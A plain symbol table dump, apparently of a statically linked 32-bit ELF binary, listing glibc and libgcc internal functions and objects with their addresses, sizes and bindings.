_Unwind_Resume_or_Rethrow	.symtab	0x80af520	249	FUNC	<unknown>	HIDDEN	3
_Unwind_SetGR	.symtab	0x80ad560	106	FUNC	<unknown>	HIDDEN	3
_Unwind_SetIP	.symtab	0x80ad4f0	14	FUNC	<unknown>	HIDDEN	3
__CTOR_END__	.symtab	0x80cf124	0	OBJECT	<unknown>	DEFAULT	15
__CTOR_LIST__	.symtab	0x80cf120	0	OBJECT	<unknown>	DEFAULT	15
__DTOR_END__	.symtab	0x80cf130	0	OBJECT	<unknown>	HIDDEN	16
__DTOR_LIST__	.symtab	0x80cf128	0	OBJECT	<unknown>	DEFAULT	16
__EH_FRAME_BEGIN__	.symtab	0x80c7efc	0	OBJECT	<unknown>	DEFAULT	11
__FRAME_END__	.symtab	0x80cdfec	0	OBJECT	<unknown>	DEFAULT	11
__JCR_END__	.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
__JCR_LIST__	.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
____strtod_l_internal	.symtab	0x80a5fb0	8404	FUNC	<unknown>	DEFAULT	3
____strtof_l_internal	.symtab	0x80a3d70	7471	FUNC	<unknown>	DEFAULT	3
____strtol_l_internal	.symtab	0x8056ab0	1065	FUNC	<unknown>	DEFAULT	3
____strtold_l_internal	.symtab	0x80a8590	8391	FUNC	<unknown>	DEFAULT	3
____strtoll_l_internal	.symtab	0x8056f10	1511	FUNC	<unknown>	DEFAULT	3
____strtoul_l_internal	.symtab	0x8079050	1026	FUNC	<unknown>	DEFAULT	3
____strtoull_l_internal	.symtab	0x80a31f0	1474	FUNC	<unknown>	DEFAULT	3
___asprintf	.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
___brk_addr	.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
___fxstat64	.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
___newselect_nocancel	.symtab	0x806917a	45	FUNC	<unknown>	DEFAULT	3
___printf_fp	.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
___vfprintf_chk	.symtab	0x806ba40	234	FUNC	<unknown>	DEFAULT	3
___vfscanf	.symtab	0x809e4d0	41	FUNC	<unknown>	DEFAULT	3
___xstat64	.symtab	0x8068ce0	54	FUNC	<unknown>	DEFAULT	3
__access	.symtab	0x808b590	31	FUNC	<unknown>	DEFAULT	3
__add_to_environ	.symtab	0x8055aa0	867	FUNC	<unknown>	DEFAULT	3
__after_morecore_hook	.symtab	0x80d4b48	4	OBJECT	<unknown>	DEFAULT	22
__alloc_dir	.symtab	0x80671b0	227	FUNC	<unknown>	DEFAULT	3
__argz_add_sep	.symtab	0x80863f0	150	FUNC	<unknown>	DEFAULT	3
__argz_count	.symtab	0x80862b0	53	FUNC	<unknown>	DEFAULT	3
__argz_create_sep	.symtab	0x80862f0	175	FUNC	<unknown>	DEFAULT	3
__argz_stringify	.symtab	0x80863a0	76	FUNC	<unknown>	DEFAULT	3
__asprintf	.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
__atomic_writev_replacement	.symtab	0x808b820	345	FUNC	<unknown>	DEFAULT	3
__backtrace	.symtab	0x806b700	211	FUNC	<unknown>	DEFAULT	3
__backtrace_symbols_fd	.symtab	0x806b860	465	FUNC	<unknown>	DEFAULT	3
__brk	.symtab	0x808b7e0	56	FUNC	<unknown>	DEFAULT	3
__bsd_signal	.symtab	0x8055400	201	FUNC	<unknown>	DEFAULT	3
__bss_start	.symtab	0x80cfcc0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__calloc	.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__cfree	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__chdir	.symtab	0x808b5d0	27	FUNC	<unknown>	DEFAULT	3
__clearenv	.symtab	0x8055940	112	FUNC	<unknown>	DEFAULT	3
__clone	.symtab	0x806acb0	119	FUNC	<unknown>	DEFAULT	3
__close	.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__close_nocancel	.symtab	0x8053ada	27	FUNC	<unknown>	DEFAULT	3
__closedir	.symtab	0x8067380	67	FUNC	<unknown>	DEFAULT	3
__connect	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__connect_internal	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__correctly_grouped_prefixmb	.symtab	0x8057b20	589	FUNC	<unknown>	DEFAULT	3
__ctype_b_loc	.symtab	0x8055260	50	FUNC	<unknown>	DEFAULT	3
__ctype_tolower_loc	.symtab	0x80551e0	50	FUNC	<unknown>	DEFAULT	3
__ctype_toupper_loc	.symtab	0x8055220	50	FUNC	<unknown>	DEFAULT	3
__curbrk	.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
__current_locale_name	.symtab	0x80a3150	27	FUNC	<unknown>	DEFAULT	3
__cxa_atexit	.symtab	0x8056120	311	FUNC	<unknown>	DEFAULT	3
__data_start	.symtab	0x80cf180	0	NOTYPE	<unknown>	DEFAULT	21
__daylight	.symtab	0x80d59e0	4	OBJECT	<unknown>	DEFAULT	22
__dcgettext	.symtab	0x8095040	57	FUNC	<unknown>	DEFAULT	3
__dcigettext	.symtab	0x8095cc0	1962	FUNC	<unknown>	DEFAULT	3
__deallocate_stack	.symtab	0x8051320	325	FUNC	<unknown>	DEFAULT	3
__default_morecore	.symtab	0x8065ea0	34	FUNC	<unknown>	DEFAULT	3
__default_stacksize	.symtab	0x80cf50c	4	OBJECT	<unknown>	DEFAULT	21
__deregister_frame	.symtab	0x80b0890	49	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info	.symtab	0x80b0870	19	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info_bases	.symtab	0x80b0780	233	FUNC	<unknown>	HIDDEN	3
__dl_iterate_phdr	.symtab	0x80b16e0	239	FUNC	<unknown>	DEFAULT	3
__dladdr	.symtab	0x809eb20	31	FUNC	<unknown>	DEFAULT	3
__dladdr1	.symtab	0x809eb40	86	FUNC	<unknown>	DEFAULT	3
__dlclose	.symtab	0x80aaaf0	25	FUNC	<unknown>	DEFAULT	3
__dlerror	.symtab	0x809e6a0	535	FUNC	<unknown>	DEFAULT	3
__dlinfo	.symtab	0x809eba0	52	FUNC	<unknown>	DEFAULT	3
__dlmopen	.symtab	0x809eca0	78	FUNC	<unknown>	DEFAULT	3
__dlopen	.symtab	0x80aa9f0	72	FUNC	<unknown>	DEFAULT	3
__dlsym	.symtab	0x80aab20	96	FUNC	<unknown>	DEFAULT	3
__dlvsym	.symtab	0x80aaba0	102	FUNC	<unknown>	DEFAULT	3
__do_global_ctors_aux	.symtab	0x80b18c0	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux	.symtab	0x8048160	0	FUNC	<unknown>	DEFAULT	3
__dprintf	.symtab	0x8083360	36	FUNC	<unknown>	DEFAULT	3
__dso_handle	.symtab	0x80b2b08	0	OBJECT	<unknown>	HIDDEN	7
__dup2	.symtab	0x808b5b0	31	FUNC	<unknown>	DEFAULT	3
__elf_set___libc_atexit_element__IO_cleanup__	.symtab	0x80c7ef0	4	OBJECT	<unknown>	DEFAULT	9
__elf_set___libc_subfreeres_element_buffer_free__	.symtab	0x80c7ec4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ec0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ec8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ecc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7edc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ee4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ee8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7eec	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_res_thread_freeres__	.symtab	0x80c7ee0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__	.symtab	0x80c7ef4	4	OBJECT	<unknown>	DEFAULT	10
__elf_set___libc_thread_subfreeres_element_res_thread_freeres__	.symtab	0x80c7ef8	4	OBJECT	<unknown>	DEFAULT	10
__environ	.symtab	0x80d5034	4	OBJECT	<unknown>	DEFAULT	22
__errno_location	.symtab	0x8054290	17	FUNC	<unknown>	DEFAULT	3
__execve	.symtab	0x8067a40	57	FUNC	<unknown>	DEFAULT	3
__exit_funcs	.symtab	0x80cf514	4	OBJECT	<unknown>	DEFAULT	21
__exit_thread	.symtab	0x8068c00	26	FUNC	<unknown>	DEFAULT	3
__fcloseall	.symtab	0x8059ac0	9	FUNC	<unknown>	DEFAULT	3
__fcntl	.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__fcntl_nocancel	.symtab	0x8053b20	69	FUNC	<unknown>	DEFAULT	3
__find_in_stack_list	.symtab	0x80508f0	131	FUNC	<unknown>	DEFAULT	3
__find_specmb	.symtab	0x8083400	117	FUNC	<unknown>	DEFAULT	3
__fini_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fini_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fopen_internal	.symtab	0x80581c0	218	FUNC	<unknown>	DEFAULT	3
__fopen_maybe_mmap	.symtab	0x8058180	63	FUNC	<unknown>	DEFAULT	3
__fork	.symtab	0x8054280	9	FUNC	<unknown>	DEFAULT	3
__fork_generation	.symtab	0x80d617c	4	OBJECT	<unknown>	DEFAULT	22
__fork_generation_pointer	.symtab	0x80d6248	4	OBJECT	<unknown>	DEFAULT	22
__fork_handlers	.symtab	0x80d624c	4	OBJECT	<unknown>	DEFAULT	22
__fork_lock	.symtab	0x80d50e0	4	OBJECT	<unknown>	DEFAULT	22
__fprintf	.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
__fpu_control	.symtab	0x80cfc58	2	OBJECT	<unknown>	DEFAULT	21
__frame_state_for	.symtab	0x80ae290	298	FUNC	<unknown>	HIDDEN	3
__free	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__free_hook	.symtab	0x80d4b44	4	OBJECT	<unknown>	DEFAULT	22
__free_stack_cache	.symtab	0x8050aa0	157	FUNC	<unknown>	DEFAULT	3
__free_tcb	.symtab	0x8051470	70	FUNC	<unknown>	DEFAULT	3
__fsetlocking	.symtab	0x8085ce0	56	FUNC	<unknown>	DEFAULT	3
__funlockfile	.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
__fxstat64	.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
__gcc_personality_v0	.symtab	0x80b14b0	538	FUNC	<unknown>	HIDDEN	3
__gconv	.symtab	0x80a2fe0	354	FUNC	<unknown>	DEFAULT	3
__gconv_alias_compare	.symtab	0x806cca0	25	FUNC	<unknown>	DEFAULT	3
__gconv_alias_db	.symtab	0x80d6318	4	OBJECT	<unknown>	DEFAULT	22
__gconv_btwoc_ascii	.symtab	0x806e830	17	FUNC	<unknown>	DEFAULT	3
__gconv_close	.symtab	0x8094890	145	FUNC	<unknown>	DEFAULT	3
__gconv_close_transform	.symtab	0x806ce00	181	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias	.symtab	0x806cd20	219	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias_cache	.symtab	0x80731e0	413	FUNC	<unknown>	DEFAULT	3
__gconv_find_shlib	.symtab	0x8073900	397	FUNC	<unknown>	DEFAULT	3
__gconv_find_transform	.symtab	0x806d7b0	564	FUNC	<unknown>	DEFAULT	3
__gconv_get_alias_db	.symtab	0x806cc40	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_builtin_trans	.symtab	0x806e660	450	FUNC	<unknown>	DEFAULT	3
__gconv_get_cache	.symtab	0x8072ee0	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_modules_db	.symtab	0x806cc30	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_path	.symtab	0x806df30	730	FUNC	<unknown>	DEFAULT	3
__gconv_load_cache	.symtab	0x8073000	479	FUNC	<unknown>	DEFAULT	3
__gconv_lock	.symtab	0x80d6314	4	OBJECT	<unknown>	DEFAULT	22
__gconv_lookup_cache	.symtab	0x8073380	1216	FUNC	<unknown>	DEFAULT	3
__gconv_max_path_elem_len	.symtab	0x80d6320	4	OBJECT	<unknown>	DEFAULT	22
__gconv_modules_db	.symtab	0x80d6310	4	OBJECT	<unknown>	DEFAULT	22
__gconv_open	.symtab	0x80a28e0	1786	FUNC	<unknown>	DEFAULT	3
__gconv_path_elem	.symtab	0x80d6324	4	OBJECT	<unknown>	DEFAULT	22
__gconv_path_envvar	.symtab	0x80d631c	4	OBJECT	<unknown>	DEFAULT	22
__gconv_read_conf	.symtab	0x806e210	1061	FUNC	<unknown>	DEFAULT	3
__gconv_release_cache	.symtab	0x8072ef0	26	FUNC	<unknown>	DEFAULT	3
__gconv_release_shlib	.symtab	0x80738b0	34	FUNC	<unknown>	DEFAULT	3
__gconv_release_step	.symtab	0x806ccc0	85	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ascii_internal	.symtab	0x806fa60	891	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ascii	.symtab	0x806f430	1573	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2	.symtab	0x806e850	1688	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2reverse	.symtab	0x8070240	1693	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4	.symtab	0x80712d0	895	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4le	.symtab	0x8071650	879	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_utf8	.symtab	0x8072680	2138	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2_internal	.symtab	0x806eef0	1343	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2reverse_internal	.symtab	0x80708e0	1374	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4_internal	.symtab	0x8070e40	1164	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4le_internal	.symtab	0x806fde0	1111	FUNC	<unknown>	DEFAULT	3
__gconv_transform_utf8_internal	.symtab	0x80719c0	3253	FUNC	<unknown>	DEFAULT	3
__gconv_translit_find	.symtab	0x8094a20	610	FUNC	<unknown>	DEFAULT	3
__gconv_transliterate	.symtab	0x8094cb0	873	FUNC	<unknown>	DEFAULT	3
__get_avphys_pages	.symtab	0x806a8a0	14	FUNC	<unknown>	DEFAULT	3
__get_nprocs	.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_nprocs_conf	.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_phys_pages	.symtab	0x806a8b0	14	FUNC	<unknown>	DEFAULT	3
__getclktck	.symtab	0x806ac40	20	FUNC	<unknown>	DEFAULT	3
__getcwd	.symtab	0x808b5f0	234	FUNC	<unknown>	DEFAULT	3
__getdelim	.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
__getdents	.symtab	0x80674a0	159	FUNC	<unknown>	DEFAULT	3
__getdtablesize	.symtab	0x8069140	41	FUNC	<unknown>	DEFAULT	3
__getegid	.symtab	0x808b560	12	FUNC	<unknown>	DEFAULT	3
__geteuid	.symtab	0x808b540	12	FUNC	<unknown>	DEFAULT	3
__getgid	.symtab	0x808b550	12	FUNC	<unknown>	DEFAULT	3
__gethostname	.symtab	0x809fcc0	140	FUNC	<unknown>	DEFAULT	3
__getpagesize	.symtab	0x8069120	23	FUNC	<unknown>	DEFAULT	3
__getpid	.symtab	0x8067ea0	49	FUNC	<unknown>	DEFAULT	3
__getrlimit	.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__getsockname	.symtab	0x806ae00	30	FUNC	<unknown>	DEFAULT	3
__getsockopt	.symtab	0x806ae20	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural	.symtab	0x8078660	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp	.symtab	0x8077ad0	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural	.symtab	0x80c2248	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse	.symtab	0x8077dd0	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday	.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal	.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__getuid	.symtab	0x808b530	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping	.symtab	0x807f2a0	76	FUNC	<unknown>	DEFAULT	3
__hash_string	.symtab	0x8078770	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx	.symtab	0x80af81d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx	.symtab	0x80af819	0	FUNC	<unknown>	HIDDEN	3
__inet_aton	.symtab	0x806b260	343	FUNC	<unknown>	DEFAULT	3
__init_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc	.symtab	0x806ac60	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio	.symtab	0x8053f80	42	FUNC	<unknown>	DEFAULT	3
__initstate	.symtab	0x8056370	112	FUNC	<unknown>	DEFAULT	3
__initstate_r	.symtab	0x8056780	545	FUNC	<unknown>	DEFAULT	3
__ioctl	.symtab	0x80690f0	33	FUNC	<unknown>	DEFAULT	3
__is_smp	.symtab	0x80d6190	4	OBJECT	<unknown>	DEFAULT	22
__isatty	.symtab	0x808b6e0	34	FUNC	<unknown>	DEFAULT	3
__isinf	.symtab	0x80964d0	64	FUNC	<unknown>	DEFAULT	3
__isinfl	.symtab	0x8096540	85	FUNC	<unknown>	DEFAULT	3
__isnan	.symtab	0x8096510	39	FUNC	<unknown>	DEFAULT	3
__isnanl	.symtab	0x80965a0	69	FUNC	<unknown>	DEFAULT	3
__kill	.symtab	0x8055560	31	FUNC	<unknown>	DEFAULT	3
__lchown	.symtab	0x8068d80	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff	.symtab	0x806b010	66	FUNC	<unknown>	DEFAULT	3
__libc_argc	.symtab	0x80d6308	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv	.symtab	0x80d630c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc	.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds	.symtab	0x8054cd0	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine	.symtab	0x806b060	27	FUNC	<unknown>	DEFAULT	3
__libc_close	.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__libc_connect	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini	.symtab	0x8055120	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init	.symtab	0x8055160	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel	.symtab	0x806b080	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose	.symtab	0x80945c0	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode	.symtab	0x8094700	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym	.symtab	0x8094620	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private	.symtab	0x8094690	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel	.symtab	0x806b0c0	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure	.symtab	0x80cf140	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided	.symtab	0x80d6304	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno	.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal	.symtab	0x8059d90	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl	.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__libc_fork	.symtab	0x8067810	535	FUNC	<unknown>	DEFAULT	3
__libc_free	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first	.symtab	0x806cba0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure	.symtab	0x806cb40	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp	.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek	.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo	.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc	.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized	.symtab	0x80cf9f8	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt	.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign	.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__libc_message	.symtab	0x8059ad0	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs	.symtab	0x80cfa4c	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep	.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__libc_open	.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__libc_pause	.symtab	0x8053de0	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init	.symtab	0x806b230	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc	.symtab	0x80630c0	469	FUNC	<unknown>	DEFAULT	3
__libc_read	.symtab	0x8053a70	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc	.symtab	0x80654c0	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom	.symtab	0x8053c90	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook	.symtab	0x80947f0	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook	.symtab	0x809e5b0	37	FUNC	<unknown>	DEFAULT	3
__libc_resp	.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select	.symtab	0x8069170	115	FUNC	<unknown>	DEFAULT	3
__libc_send	.symtab	0x806ae40	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto	.symtab	0x8053cf0	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock	.symtab	0x80d58a0	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls	.symtab	0x8054f00	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction	.symtab	0x8054730	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp	.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end	.symtab	0x80cf13c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main	.symtab	0x80549b0	763	FUNC	<unknown>	DEFAULT	3
__libc_system	.symtab	0x8057a30	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres	.symtab	0x80b2980	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B	.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER	.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER	.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE	.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC	.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc	.symtab	0x80632a0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid	.symtab	0x8053e20	91	FUNC	<unknown>	DEFAULT	3
__libc_write	.symtab	0x8053a10	91	FUNC	<unknown>	DEFAULT	3
__libc_writev	.symtab	0x808b980	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt	.symtab	0x80c2e00	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit	.symtab	0x80c2e78	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait	.symtab	0x8053730	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private	.symtab	0x8053700	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait	.symtab	0x80538e0	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait	.symtab	0x8053940	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait	.symtab	0x8053760	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid	.symtab	0x8053870	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake	.symtab	0x8053840	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private	.symtab	0x8053810	37	FUNC	<unknown>	HIDDEN	3
__llseek	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__localtime_r	.symtab	0x8086e00	34	FUNC	<unknown>	DEFAULT	3
__longjmp	.symtab	0x80553b0	43	FUNC	<unknown>	DEFAULT	3
__lseek	.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__lseek64	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable	.symtab	0x8051210	257	FUNC	<unknown>	DEFAULT	3
__mallinfo	.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__malloc	.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init	.symtab	0x8060000	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state	.symtab	0x8064180	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook	.symtab	0x80cf9ec	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook	.symtab	0x80d4b40	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state	.symtab	0x8060dc0	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats	.symtab	0x8060840	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim	.symtab	0x8060bd0	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size	.symtab	0x805f010	52	FUNC	<unknown>	DEFAULT	3
__mallopt	.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__mbrlen	.symtab	0x8086500	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc	.symtab	0x8086540	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs	.symtab	0x8086ae0	594	FUNC	<unknown>	DEFAULT	3
__memalign	.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook	.symtab	0x80cf9f4	4	OBJECT	<unknown>	DEFAULT	21
__memchr	.symtab	0x8066760	411	FUNC	<unknown>	DEFAULT	3
__mempcpy	.symtab	0x8066a20	68	FUNC	<unknown>	DEFAULT	3
__mkdir	.symtab	0x8068d60	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal	.symtab	0x809f300	2437	FUNC	<unknown>	DEFAULT	3
__mmap	.symtab	0x8069da0	67	FUNC	<unknown>	DEFAULT	3
__mmap64	.symtab	0x8069df0	88	FUNC	<unknown>	DEFAULT	3
__mon_yday	.symtab	0x80c72c0	52	OBJECT	<unknown>	DEFAULT	7
__morecore	.symtab	0x80cf9e8	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n	.symtab	0x80aa690	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1	.symtab	0x80aa720	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp	.symtab	0x8096b60	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double	.symtab	0x80aa7a0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float	.symtab	0x80aa760	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double	.symtab	0x80aa800	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem	.symtab	0x8096bc0	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double	.symtab	0x80988b0	244	FUNC	<unknown>	DEFAULT	3
__mpn_extract_long_double	.symtab	0x80989b0	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n	.symtab	0x8097670	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase	.symtab	0x8097570	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n	.symtab	0x8097e40	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase	.symtab	0x8097470	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift	.symtab	0x8097020	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul	.symtab	0x80970e0	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1	.symtab	0x8097430	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n	.symtab	0x8098570	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift	.symtab	0x8097080	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n	.symtab	0x80987e0	144	FUNC	<unknown>	DEFAULT	3
